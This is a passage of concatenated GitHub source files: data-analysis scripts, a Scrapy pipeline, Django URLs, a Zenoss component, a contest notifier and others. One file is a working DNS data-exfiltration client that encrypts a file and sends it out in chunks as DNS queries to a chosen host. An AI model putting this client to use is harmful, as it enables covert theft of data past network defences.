f'/key_features_PCN.pickle', 'rb') as f:\n data = pickle.load(f)\n\n for KF, val in data.items():\n\n # KF are subreddit specific\n if type(val) == dict:\n for subreddit in val.keys():\n KF_PCN_PushShift[subreddit][KF] = val[subreddit]\n\n# Other\nwith open(path_KF + f'/key_features_PCN.pickle', 'rb') as f:\n data = pickle.load(f)\n\n for KF, val in data.items():\n\n # KF are subreddit specific\n if type(val) == dict:\n for subreddit in val.keys():\n KF_PCN[subreddit][KF] = val[subreddit]\n\n\n# Compute key feature statistics\n\ndef computeStatistics(dictionary):\n # Output structure\n KF_Stats = {subreddit: dict() for subreddit in dictionary.keys()}\n\n # Non-numerical KFs\n excluding_KF = [\"Communities\", \"VoteRank\"]\n\n for subreddit in dictionary.keys():\n for key in dictionary[subreddit].keys():\n if key not in excluding_KF:\n data = dictionary[subreddit][key]\n if type(data) == list:\n KF_Stats[subreddit][key] = [mean(data)] # could add stdev later\n elif type(data) == dict:\n KF_Stats[subreddit][key] = 
[mean(data.values())]\n\n return KF_Stats\n\n## PushShift\n\n# Statistics for UN\nKF_UN_PushShift_Stats = computeStatistics(KF_UN_PushShift)\n\n# Statistics for PCN\nKF_PCN_PushShift_Stats = computeStatistics(KF_PCN_PushShift)\n\n## Other\n\n# Statistics for UN\nKF_UN_Stats = computeStatistics(KF_UN)\n\n# Statistics for PCN\nKF_PCN_Stats = computeStatistics(KF_PCN)\n\n# Function to produce a scatter grid\ndef scatterGrid(dict_x, dict_y, fName):\n # Get the names of the KFs\n KF_List_x = list(dict_x[list(dict_x.keys())[0]].keys())\n KF_List_y = list(dict_y[list(dict_y.keys())[0]].keys())\n\n n_KF_x = len(KF_List_x)\n n_KF_y = len(KF_List_y)\n\n\n fig, axs = plt.subplots(ncols=n_KF_x, nrows=n_KF_y, figsize=(n_KF_x * 5,n_KF_y * 5))\n\n for i,j in [(i,j) for i in range(n_KF_y) for j in range(n_KF_x)]:\n axs[i][j].scatter(\\\n x = [dict_x[subreddit][KF_List_x[j]][0] for subreddit in dict_x.keys()],\\\n y = [dict_y[subreddit][KF_List_y[i]][0] for subreddit in dict_y.keys()])\n\n axs[i][j].set_xlabel(KF_List_x[j])\n axs[i][j].set_ylabel(KF_List_y[i])\n\n saveFolder = \"KeyFeaturePlots/\"\n plt.tight_layout()\n fig.savefig(saveFolder + fName + '.png')\n\n\n## PushShift\n\n# Scatter grid only UN\nscatterGrid(KF_UN_PushShift_Stats, KF_UN_PushShift_Stats, \"KF_UN_PushShift_UN_PushShift\")\n\n# Scatter grid only PCN\nscatterGrid(KF_PCN_PushShift_Stats, KF_PCN_PushShift_Stats, \"KF_PCN_PushShift_PCN_PushShift\")\n\n# Scatter grid both UN and PCN\nscatterGrid(KF_UN_PushShift_Stats, KF_PCN_PushShift_Stats, \"KF_UN_PushShift_PCN_PushShift\")\n\n## Other\n\n# Scatter grid only UN\nscatterGrid(KF_UN_Stats, KF_UN_Stats, \"KF_UN_UN\")\n\n# Scatter grid only PCN\nscatterGrid(KF_PCN_Stats, KF_PCN_Stats, \"KF_PCN_PCN\")\n\n# Scatter grid both UN and PCN\nscatterGrid(KF_UN_Stats, KF_PCN_Stats, \"KF_UN_PCN\")","repo_name":"Ana-Maria-O/Echo-Chambers","sub_path":"ComparisonPCN_UN.py","file_name":"ComparisonPCN_UN.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"825931350","text":"from bs4 import BeautifulSoup \nfrom datetime import datetime, timedelta\nimport requests\nimport re\nimport time\nimport subprocess\n\n\ndef sendmessage(header,message):\n subprocess.Popen(['notify-send', header,message])\n return\n\n\ndef get_upcoming_contests(url):\n\tsoup = BeautifulSoup(requests.get(url).text, \"lxml\")\n\ttables = soup.findAll(\"table\")\n\tupcoming_table = tables[0]\n\trows = upcoming_table.findAll(\"tr\")\n\tconcerned = []\n\tfor row in rows[1:]:\n\t\ttry:\n\t\t\tcontest_name = row.findAll(\"td\")[0].find(text = True)\n\t\t\ttemp = datetime.strptime(row.findAll(\"td\")[4].find(\"span\").find(text = True), '%H:%M:%S')\n\t\t\tbefore_start = timedelta(hours = temp.hour, minutes = temp.minute, seconds = temp.second)\n\t\t\tconcerned.append({\"name\": contest_name, \"time left\": before_start})\n\t\texcept:\n\t\t\tcontinue\n\treturn concerned\n\n\ndef notify_these(contests):\n\tfifteen_m = timedelta(minutes = 15)\n\tfor x in contests:\n\t\tif fifteen_m >= x['time left']:\n\t\t\theader = 'Codeforces reminder!' 
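# fires only when 15 minutes or less remain before the contest starts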
\n\t\t\tmessage = x['name'] + \"\\nStarts in \" + str(x['time left'])\n\t\t\tsendmessage(header, message)\n\n\nif __name__ == \"__main__\":\n\turl = \"http://codeforces.com/contests\"\n\twhile True:\n\t\ttry:\n\t\t\tnotify_these(get_upcoming_contests(url))\n\t\t\ttime.sleep(5*60)\n\t\texcept:\n\t\t\ttime.sleep(5*60)\n","repo_name":"Parth7/NTU","sub_path":"cf.py","file_name":"cf.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70720484073","text":"import asyncio\nfrom typing import AsyncGenerator\n\nfrom src.domain.costs.models import Cost, CostInDB, CostUncommited\nfrom src.domain.costs.repository import CostsCRUD\nfrom src.domain.dates import DateFormat\nfrom src.domain.dates import services as dates_services\nfrom src.domain.money import CurrenciesCRUD\nfrom src.infrastructure.cache import Cache\nfrom src.infrastructure.errors import NotFound\n\n\nasync def add(schema: CostUncommited) -> Cost:\n \"\"\"Adding the cost means:\n 1. Adding record to the costs table.\n 2. Changing the currencies table's equity value.\"\"\"\n\n cost_in_db: CostInDB = await CostsCRUD().create(schema)\n\n await CurrenciesCRUD().decrease_equity(\n id_=cost_in_db.currency_id, value=cost_in_db.value\n )\n cost: Cost = await CostsCRUD().get(id_=cost_in_db.id)\n\n return cost\n\n\nasync def delete(cost: Cost):\n \"\"\"Delete the cost means:\n 1. Delete the record from the costs table.\n 2. Changing the currencies table's equity value.\"\"\"\n\n await CurrenciesCRUD().increase_equity(\n id_=cost.currency.id, value=cost.value\n )\n await CostsCRUD().delete(id_=cost.id)\n\n\nasync def get_last_months(\n limit: int | None = None,\n) -> AsyncGenerator[str, None]:\n \"\"\"Fetch last months from the cache or database.\n If data is fetched from the database it saves to the cache then.\n\n This function mostly is created in order to be used\n for costs delete operation.\"\"\"\n\n try:\n first = Cache.get(namespace=\"costs\", key=\"first_date\")\n last = Cache.get(namespace=\"costs\", key=\"last_date\")\n except NotFound:\n crud = CostsCRUD()\n first, last = await asyncio.gather(crud.first(), crud.last())\n Cache.set(\n namespace=\"costs\",\n key=\"first_date\",\n instance=first,\n )\n Cache.set(\n namespace=\"costs\",\n key=\"last_date\",\n instance=last,\n )\n\n for index, item in enumerate(\n dates_services.represent_dates_range(\n first.date, last.date, DateFormat.MONTHLY\n )\n ):\n if limit and index > limit:\n break\n\n yield item\n","repo_name":"parfeniukink/family_budget_bot","sub_path":"src/domain/costs/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"1229428747","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 21 19:06:02 2022\n\n@author: bened\n\"\"\"\n\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nimport pandas as pd\nfrom sklearn.datasets import fetch_california_housing\nimport itertools\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\n\nhousing = fetch_california_housing()\n\n# Converting sklearn Bunch object into pandas data frame\n# Without target column\nhousing_df = pd.DataFrame(data=housing['data'], columns=housing['feature_names'])\n\n\n#######################\n######## 2.1.1 
########\n#######################\n\n\n# There have to be 56 unique combinations for taking subsets of 3 (k) from 8 (n) features:\n# n!/k!(n-k)! = 8!/3!5! = 56\ndef get_subsets(features):\n comb_all= list(itertools.combinations(features,3)) # all combinations as tuples\n comb_all = [list(t) for t in comb_all] # format for indexing in pd data frame\n return comb_all\n\nhousing_subsets = get_subsets(housing_df.columns)\nhouse_target = housing['target'] # type np array\n\n\ndef lin_reg(data,target):\n \n feature_names = list(data.columns)\n X = data.to_numpy() # shape: (20640,3)\n y = target # shape: (20640,)\n lin_regressor = LinearRegression()\n lin_regressor.fit(X,y)\n y_hat = lin_regressor.predict(X)\n mse = mean_squared_error(y, y_hat)\n \n return ((feature_names,mse))\n\n\n\ndef lin_reg_subsets():\n min_error = 1000\n for subs in housing_subsets:\n l_r= lin_reg(housing_df[subs],house_target)\n print(l_r)\n if l_r[1] < min_error:\n min_error = l_r[1]\n min_error_set = l_r[0]\n print('\\n')\n print('Min error set: ',min_error_set,'\\n Min error: ',min_error)\n \n \n\n\n#######################\n######## 2.1.2 ########\n#######################\n\n\ndef compute_reconstr_error(array1,array2):\n \"\"\"\n For two arrays, computes the MSE, which in this case constitutes the reconstruction error.\n \n array1: original data\n array2: reconstructed data\n \n 1. Matrix substraction to get matrix of differences for each datapoint in each variable\n 2. Square those differences.\n 3. Sum the squared differences along the columns (axis=1) to obtain vector of summed squared differences\n 4. Compute mean for vector of summed squared differences = MSE\n \n Return MSE\n \"\"\"\n return np.sum((array1-array2)**2,axis=1).mean()\n\n\ndef run_pca(data,pc_num):\n \"\"\"\n For a given dataset and specified number of PCs, run PCA.\n \n data: original dataset\n pc_num: number of principal components (max: number of variables in dataset)\n \n Returns output dictionary of the form:\n \n \"Norm data\": normalised original data\n \"PCA data\": dimensionality reduced data\n \"Reconstr norm data\": the reconstructed data (still normalized)\n \"Reconstr data\": the reconstructed data (normalization reversed)\n \"Reconstr error norm\": error between normalized and reconstructed normalized data\n \"Reconstr error original\": error between original data and reconstructed data (normalization reversed)\n \n \"\"\"\n \n assert pc_num <= data.shape[1],'Number of principal components higher than number of variables'\n \n out_dict = dict()\n \n scaler = StandardScaler()\n scaler_fitted = scaler.fit(data)\n norm_data =scaler_fitted.transform(data)\n \n pca = PCA(n_components=pc_num)\n pca_fitted = pca.fit(norm_data)\n pca_data = pca_fitted.transform(norm_data)\n \n reconstr_norm_data = pca_fitted.inverse_transform(pca_data) # reconstructed from PCA\n reconstr_data =scaler_fitted.inverse_transform(reconstr_norm_data)\n \n reconstr_error_norm = compute_reconstr_error(norm_data, reconstr_norm_data)\n reconstr_error_original = compute_reconstr_error(data, reconstr_data)\n \n out_dict[\"Norm data\"] = norm_data\n out_dict[\"PCA data\"] = pca_data\n out_dict[\"Reconstr norm data\"] = reconstr_norm_data\n out_dict[\"Reconstr data\"] = reconstr_data\n out_dict[\"Reconstr error norm\"] = reconstr_error_norm\n out_dict[\"Reconstr error original\"] = reconstr_error_original\n out_dict[\"Component corrs\"] = pca.components_ # Correlation between PCs and original features \n \n # Selecting the strongest feature correlation for each PC\n 
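# (matching on absolute values below, so components whose strongest loading is negative are not missed)\n 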
out_dict[\"Strongest corrs\"] = []\n for v in out_dict[\"Component corrs\"]:\n v_abs = np.absolute(v)\n v_max= np.max(v_abs)\n ind = np.where(v==v_max)[0][0] # returns int\n out_dict[\"Strongest corrs\"].append(ind)\n \n \n return out_dict\n\n\ndef house_pca_reg():\n \n house_pca = run_pca(housing_df, 3)\n \n # Setting names for the PCs by selecting the strongest feature correlation\n pca_names = []\n for i,k in enumerate(house_pca[\"Strongest corrs\"]):\n pc_num = i+1\n feat_name = housing_df.columns[k]\n pca_names.append('PC '+str(pc_num)+' '+feat_name)\n \n pca_frame = pd.DataFrame(data=house_pca[\"PCA data\"],columns=pca_names)\n print(lin_reg(pca_frame,house_target))\n \n\n\n\n\n#######################\n######## 2.2 ##########\n#######################\n\n\ndef lin_reg_1d(data,target):\n \n out_dict= dict()\n \n feature_name = data.name\n X = data.to_numpy() # shape: (20640,)\n X = X.reshape(-1, 1) # shape: (20640,1)\n y = target # shape: (20640,)\n lin_regressor = LinearRegression()\n lin_regressor.fit(X,y)\n y_hat = lin_regressor.predict(X)\n mse = mean_squared_error(y, y_hat)\n \n out_dict['feature name'] = feature_name\n out_dict['mse'] = mse\n out_dict['X'] = X\n out_dict['y_hat'] = y_hat\n out_dict['y'] = y\n out_dict['coeffs'] = lin_regressor.coef_\n out_dict['intercept'] = lin_regressor.intercept_\n \n return (out_dict)\n \n\ndef subset_PCA_1dim():\n \n #### Subset method ####\n all_linreg_outs = []\n for feat in housing_df.columns: # Do lin reg on every variable\n linreg_out = lin_reg_1d(housing_df[feat], house_target)\n all_linreg_outs.append(linreg_out) # store each out dict\n min_error = 1000\n min_dict =dict()\n for d in all_linreg_outs:\n if d['mse'] < min_error:\n min_error = d['mse']\n min_dict = d\n else:\n continue\n \n print('Subset MSE: ',min_dict['mse'],'\\n')\n \n #### Plot outputs subset ####\n plt.scatter(min_dict['X'],min_dict['y'])\n \n # Compute y_hat values with slope intercept formula\n y_vals = min_dict['intercept'] + min_dict['coeffs']*min_dict['X']\n plt.plot(min_dict['X'],y_vals, color='green',linewidth=3)\n \n # Or directly produce line plot with y_hat values from lin reg (same result)\n #plt.plot(min_dict['X'],min_dict['y_hat'], color='red',linewidth=3)\n \n plt.title('Linear regression subset method')\n plt.ylabel('Price')\n plt.xlabel(min_dict['feature name'])\n plt.show()\n \n #print(min_dict['coeffs'])\n #print(min_dict['intercept'])\n \n #### PCA method ####\n house_pca_1d = run_pca(housing_df, 1)\n pca_1d_frame = pd.Series(data=house_pca_1d['PCA data'].flatten())\n lin_reg_pca = lin_reg_1d(pca_1d_frame,house_target)\n \n print('PCA MSE: ',lin_reg_pca['mse'],'\\n')\n \n #### Plot outputs subset ####\n plt.scatter(lin_reg_pca['X'],lin_reg_pca['y'])\n \n # Compute y_hat values with slope intercept formula\n y_vals = lin_reg_pca['intercept'] + lin_reg_pca['coeffs']*lin_reg_pca['X']\n plt.plot(lin_reg_pca['X'],y_vals, color='yellow',linewidth=3)\n \n # Or directly produce line plot with y_hat values from lin reg (same result)\n #plt.plot(lin_reg_pca['X'],lin_reg_pca['y_hat'], color='red',linewidth=3)\n \n plt.title('Linear regression PCA method')\n plt.ylabel('Price')\n plt.xlabel('PC')\n plt.show()\n \n","repo_name":"lflage/NNIA_22_23","sub_path":"Assignment_3/Solution_A3.py","file_name":"Solution_A3.py","file_ext":"py","file_size_in_byte":7809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27685463170","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# URL of the website you 
want to capture\ntarget_url = \"https://www.google.com/search?q=anthony+mccall&rlz=1C5CHFA_enKR1016KR1017&source=lnms&tbm=isch&sa=X&ved=2ahUKEwjl5oeik5v9AhXrrokEHYDtCEcQ_AUoAXoECAEQAw&biw=1147&bih=637&dpr=2\"\n\n# Send a GET request to the website\nresponse = requests.get(target_url)\n\n# Check if the request was successful (status code 200)\nif response.status_code == 200:\n # Parse the HTML content of the page\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # Find and extract the content you want\n # (Modify this based on the structure of the target website)\n target_content = soup.find('div', class_='example-class')\n\n # Save the extracted content to a file or display it on your website\n with open(\"path/to/captured_content.html\", \"w\", encoding=\"utf-8\") as file:\n file.write(str(target_content))\nelse:\n print(f\"Failed to retrieve content. Status code: {response.status_code}\")\n","repo_name":"jiho6693/archive","sub_path":"catpure.py","file_name":"catpure.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39119579764","text":"import diplomacy\n\ndef createTestGame():\n territory_list = [\n ['LON', ['PAR', 'VEN', 'MUN', 'MOS', 'BUD', 'ANK']],\n ['PAR', ['LON', 'VEN', 'MUN', 'MOS', 'BUD', 'ANK']],\n ['VEN', ['PAR', 'LON', 'MUN', 'MOS', 'BUD', 'ANK']],\n ['MUN', ['PAR', 'VEN', 'LON', 'MOS', 'BUD', 'ANK']],\n ['MOS', ['PAR', 'VEN', 'MUN', 'LON', 'BUD', 'ANK']],\n ['BUD', ['PAR', 'VEN', 'MUN', 'MOS', 'LON', 'ANK']],\n ['ANK', ['PAR', 'VEN', 'MUN', 'MOS', 'BUD', 'LON']]\n ]\n\n powers_list = [\n ['Austria', [['LON', 'Army'], ['BUD', 'Army']]],\n ['France', [['PAR', 'Army'], ['MOS','None'],['VEN','Army']]]\n ]\n\n order_list = [\n ['LON','Hold'],\n ['BUD','Move', 'MOS'],\n ['PAR','Hold_Support', 'MOS'],\n ['VEN','Move_Support', 'BUD', 'MOS']\n ]\n\n testGame = diplomacy.Game()\n\n testGame.name ='Test Game'\n\n testGame.createTerritoriesFromList(territory_list)\n\n testGame.createPowersWithUnitsFromList(powers_list)\n\n return testGame\n\ndef main ():\n print('diplomacyTests is main')\n\n testGame = createTestGame()\n\n print(testGame)\n\nif __name__ == \"__main__\":\n main ()\n\n\n","repo_name":"NicholasDeLateur/DiplomacyAdjudicator","sub_path":"diplomacyTests.py","file_name":"diplomacyTests.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29488987120","text":"from django.conf.urls import url\nfrom . 
import views\nfrom vehicle_models.views import AddManufacturer\n\napp_name='showrooms'\n\nurlpatterns=[\n\n\n url(r'^add_model/', AddManufacturer.as_view(), name='add_model'),\n url(r'^newSale/', views.NewSaleView.as_view(), name='newSale'),\n url(r'^processSale/', views.processSale, name='processSale'),\n url(r'^salesList/', views.ListSalesView.as_view(), name='salesList'),\n url(r'^report', views.salesNumber, name='report'),\n url(r'^$', views.ManufacturerListView.as_view(), name='manufacturerLists'),\n url(r'^manufacturer/category/(?P<pk>\\d+)/$', views.CategoryListView.as_view(), name='categoryList'),\n url(r'^manufacturer/category/vehicleName/(?P<pk>\\d+)/$', views.VehicleNameListView.as_view(), name='vehicleNameList'),\n url(r'^manufacturer/category/vehicleName/models/(?P<pk>\\d+)/$', views.ModelListView.as_view(), name='modelList'),\n url(r'^manufacturer/category/vehicleName/models/details/(?P<pk>\\d+)/$', views.ModelDetailsView.as_view(), name='modelDetails'),\n\n\n\n\n\n\n\n\n]","repo_name":"RajivSah/ShowRoom","sub_path":"showrooms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22762074434","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\nimport pymysql\nfrom scrapy.utils.project import get_project_settings\n\nclass MaoyanPipeline:\n\n    def process_item(self, item, spider):\n        film_name = item['film_name']\n        film_type = item['film_type']\n        plan_date = item['plan_date']\n        movies = [(film_name, film_type, plan_date)]\n        # read the MySQL connection settings from the project config\n        settings = get_project_settings()\n        dbInfo = settings.get('MYSQL_CONFIG')\n        conn = pymysql.connect(\n            host=dbInfo['host'],\n            port=dbInfo['port'],\n            user=dbInfo['user'],\n            password=dbInfo['password'],\n            db=dbInfo['db']\n        )\n        cur = conn.cursor()\n        sqls = ['create table if not exists maoyanmovies(film_name varchar(255),film_type varchar(255),plan_date varchar(255))']\n        try:\n            for s in sqls:\n                cur.execute(s)\n            cur.executemany('insert into maoyanmovies values(%s,%s,%s)', movies)\n            cur.close()\n            conn.commit()\n        except:\n            conn.rollback()\n            raise Exception('Data insertion failed')\n        finally:\n            conn.close()\n","repo_name":"perceive123/Python004","sub_path":"Week02/homework1/maoyan/maoyan/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"23282799260","text":"import binascii\nimport dns.name\nimport dns.message\nimport dns.query\nimport dns.flags\nimport dns.resolver\nimport time\nimport os.path\nimport base64\nfrom crypto import AES256\n\n\nclass ExfilClient:\n    def __init__(self, args):\n        self.dest = args.dest\n        self.port = args.port\n        self.delay = float(args.delay)\n        self.file = args.file\n        self.packet_size = args.packetsize\n        self.ADDITIONAL_RDCLASS = 65535\n        self.password = args.password\n\n    def run(self):\n        # check if file exists\n        if not os.path.exists(self.file):\n            print(f\"File '{self.file}' does not exist. 
Aborting\")\n return\n\n # get file name\n filename = os.path.basename(self.file)\n filenamebase64 = base64.b64encode(filename.encode(\"utf-8\")).decode(\"utf-8\")\n\n # read file to buffer\n buffer = bytearray()\n with open(self.file, \"rb\") as f:\n buffer = f.read()\n if len(buffer) == 0:\n print(f\"File '{self.file}' is empty. Aborting\")\n return\n\n print(f\"Read {len(buffer)} bytes from {self.file}\")\n\n # encrypt entire file buffer\n aes = AES256(self.password)\n contents_encrypted = aes.encrypt_bytes(buffer)\n contents_length = len(contents_encrypted)\n\n # split buffer into packets of self.packet_size\n num_packets = int(contents_length / self.packet_size)\n if contents_length % self.packet_size != 0:\n num_packets += 1\n\n packets = []\n for n in range(0, num_packets):\n contents_start = n * self.packet_size\n contents_end = contents_start + self.packet_size\n if contents_end >= contents_length:\n contents_end = contents_length\n packet = contents_encrypted[contents_start:contents_end]\n packets.append(packet)\n\n print(f\"Prepared {len(packets)} packets of {self.packet_size} bytes for exfiltration\")\n\n # send each packet as a dns query to dest:port\n self.send_packet(f\"BEGIN={filenamebase64}\")\n c = 1\n for p in packets:\n domain = p.decode(\"utf-8\") + \"\"\n self.send_packet(domain)\n print(f\"[{c}/{num_packets}]: sent {domain}\")\n time.sleep(self.delay)\n c += 1\n self.send_packet(\"---END---\")\n\n print()\n print(f\"Done! Sent {self.file} in {len(packets)} DNS queries\")\n\n def send_packet(self, domain):\n try:\n # print(f\"Sending packet: {domain}...\")\n domain = dns.name.from_text(domain)\n\n if not domain.is_absolute():\n domain = domain.concatenate(dns.name.root)\n\n request = dns.message.make_query(domain, dns.rdatatype.A)\n request.flags |= dns.flags.AD\n request.find_rrset(request.additional, dns.name.root, self.ADDITIONAL_RDCLASS, dns.rdatatype.OPT, create=True, force_unique=True)\n response = dns.query.udp(request, self.dest, port=self.port, timeout=1, ignore_trailing=True, ignore_unexpected=False)\n\n # print(response.answer)\n # print(response.additional)\n # print(response.authority)\n\n # as of now the ExfilHost sends back a malformed DNS packet. I have yet to fix this. Feel free to contribute.\n # therefore, getting a BadLabelType exception as a response is considered to be a valid response (I know...)\n except dns.name.BadLabelType as e:\n print(\"Success:\", domain)\n\n except dns.name.LabelTooLong:\n print(\"ERROR: DNS label too long! Unable to exfiltrate data. 
Aborting\")\n return\n\n # this shouldn't happen, but hey\n except Exception as ex:\n pass\n # print(type(ex))\n print(\"General exception:\", ex)\n\n","repo_name":"346pa034/python-dns-data-exfiltrator","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29377319652","text":"from debugtalks.models import DebugTalks\nfrom projects.models import Projects\n\n\ndef get_projects(datas):\n datas_list = []\n for item in datas:\n projects = DebugTalks.objects.get(id=item[\"id\"]).projects.all()\n if projects:\n item[\"project\"] = \",\".join([project.name for project in projects])\n else:\n item[\"project\"] = \"无所属项目\"\n datas_list.append(item)\n return datas_list\n","repo_name":"op896898466/apitest","sub_path":"apps/debugtalks/untils.py","file_name":"untils.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"38574085518","text":"##########################################################################\n# Author: Jane Curry, jane.curry@skills-1st.co.uk\n# Date: February 24th, 2011\n# Revised:\n#\n# JuniperComponents object class\n#\n# This program can be used under the GNU General Public License version 2\n# You can find full information here: http://www.zenoss.com/oss\n#\n##########################################################################\n\n__doc__=\"\"\"JuniperComponents\n\nJuniperComponents is a component of a JuniperDevice Device\n\n$Id: $\"\"\"\n\n__version__ = \"$Revision: $\"[11:-2]\n\nfrom Globals import DTMLFile\nfrom Globals import InitializeClass\n\nfrom Products.ZenRelations.RelSchema import *\nfrom Products.ZenModel.ZenossSecurity import ZEN_VIEW, ZEN_CHANGE_SETTINGS\n\nfrom Products.ZenModel.DeviceComponent import DeviceComponent\nfrom Products.ZenModel.ManagedEntity import ManagedEntity\n\nimport logging\nlog = logging.getLogger('JuniperComponents')\n\nclass JuniperComponents(DeviceComponent, ManagedEntity):\n \"\"\"Juniper Components object\"\"\"\n\n portal_type = meta_type = 'JuniperComponents'\n \n #**************Custom data Variables here from modeling************************\n \n containerIndex = 1\n containerDescr = ''\n containerParentIndex = 1\n containerParentDescr = ''\n containerType = ''\n containerLevel = 0\n containerNextLevel = 0\n \n #**************END CUSTOM VARIABLES *****************************\n \n \n #************* Those should match this list below *******************\n _properties = (\n {'id':'containerIndex', 'type':'int', 'mode':''},\n {'id':'containerDescr', 'type':'string', 'mode':''},\n {'id':'containerParentIndex', 'type':'int', 'mode':''},\n {'id':'containerParentDescr', 'type':'string', 'mode':''},\n {'id':'containerType', 'type':'string', 'mode':''},\n {'id':'containerLevel', 'type':'int', 'mode':''},\n {'id':'containerNextLevel', 'type':'int', 'mode':''},\n )\n #****************\n \n _relations = (\n (\"JuniperDevComp\", ToOne(ToManyCont,\n \"ZenPacks.ZenSystems.Juniper.JuniperDevice\", \"JuniperComp\")),\n )\n\n factory_type_information = ( \n { \n 'id' : 'JuniperComponents',\n 'meta_type' : 'JuniperComponents',\n 'description' : \"\"\"Juniper Components info\"\"\",\n 'product' : 'Juniper',\n 'immediate_view' : 'viewJuniperComponents',\n 'actions' :\n ( \n { 'id' : 'status'\n , 'name' : 'Juniper Components Graphs'\n , 'action' : 'viewJuniperComponents'\n , 'permissions' : (ZEN_VIEW, )\n },\n { 
'id' : 'perfConf'\n , 'name' : 'Juniper Components Template'\n , 'action' : 'objTemplates'\n , 'permissions' : (ZEN_CHANGE_SETTINGS, )\n }, \n { 'id' : 'viewHistory'\n , 'name' : 'Modifications'\n , 'action' : 'viewHistory'\n , 'permissions' : (ZEN_VIEW, )\n },\n )\n },\n ) \n\n isUserCreatedFlag = True\n\n def isUserCreated(self):\n \"\"\"\n Returns the value of isUserCreated. True adds SAVE & CANCEL buttons to Details menu\n \"\"\"\n return self.isUserCreatedFlag\n\n def viewName(self):\n \"\"\"Pretty version human readable version of this object\"\"\"\n return self.id\n\n\n # use viewName as titleOrId because that method is used to display a human\n # readable version of the object in the breadcrumbs\n titleOrId = name = viewName\n\n\n def device(self):\n return self.JuniperDevComp()\n \nInitializeClass(JuniperComponents)\n","repo_name":"zenoss/Community-Zenpacks","sub_path":"ZenPacks.ZenSystems.Juniper/ZenPacks/ZenSystems/Juniper/JuniperComponents.py","file_name":"JuniperComponents.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"4232332237","text":"import numpy as np\nfrom pymoo.core.sampling import Sampling\n\n\nclass InitialStateSampling(Sampling):\n \"\"\"\n Repeat the initial state\n \"\"\"\n\n def __init__(self, type_mask) -> None:\n self.type_mask = type_mask\n super().__init__()\n\n def _do(self, problem, n_samples, **kwargs):\n\n # Retrieve original\n x_clean = problem.x_clean[problem.constraints.mutable_features]\n\n x_generated = np.tile(x_clean, (n_samples, 1))\n\n mask_int = self.type_mask != \"real\"\n\n x_generated[:, mask_int] = np.rint(x_generated[:, mask_int]).astype(\n int\n )\n\n return x_generated\n","repo_name":"serval-uni-lu/constrained-attacks","sub_path":"constrained_attacks/attacks/moeva/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"7896932778","text":"\"\"\"\n this file that display all features and take valid response from the user\n this features will be as:\n - download specific video with link with a specific resolution if the video have it\n logic of this file will be :\n /*\n 1- the user will ask to enter link of youtube video that want to download\n 2- system will check this is a valid youtube link or not\n 3- if it is not valid link he will go to step 1, else continue\n 4- system will display all resolution are in this video\n 5- the user will ask to enter a valid type, as like as \"mp4\", \"mp3\"\n 6- if not valid will go to step 5, else continue\n 7- user will ask to enter valid resolution for this type\n 8- if not valid will go to step 8, else continue\n 9- then user will ask for the name of the file he wants to download\n 10- then he will ask for location for this file\n 11- then this data will be sent to download video file and start to download\n */\n\"\"\"\n\n# importing the module\nfrom pytube import YouTube\nimport os\n\n# class DownloadVideo:\n# videoObj = \"\"\n# typeToDownload = \"\"\n# res = 0\n# destinationLocation = \"\"\n#\n# def __init__(self, videoObj, typeToDownload, res, destinationLocation):\n# self.destinationLocation = destinationLocation\n# self.res = res\n# self.videoObj = videoObj\n# self.typeToDownload = typeToDownload\n#\n# def __str__(self):\n# return str(self.videoObj.streams.filter(mime_type=self.typeToDownload, resolution=self.res))\n\n\n\nclass VideoData:\n 
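# Rough usage sketch (hypothetical driver; assumes pytube is installed):\n #   stream, folder, fname = VideoData.get_video_data()\n #   stream.download(output_path=folder, filename=fname)\n 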
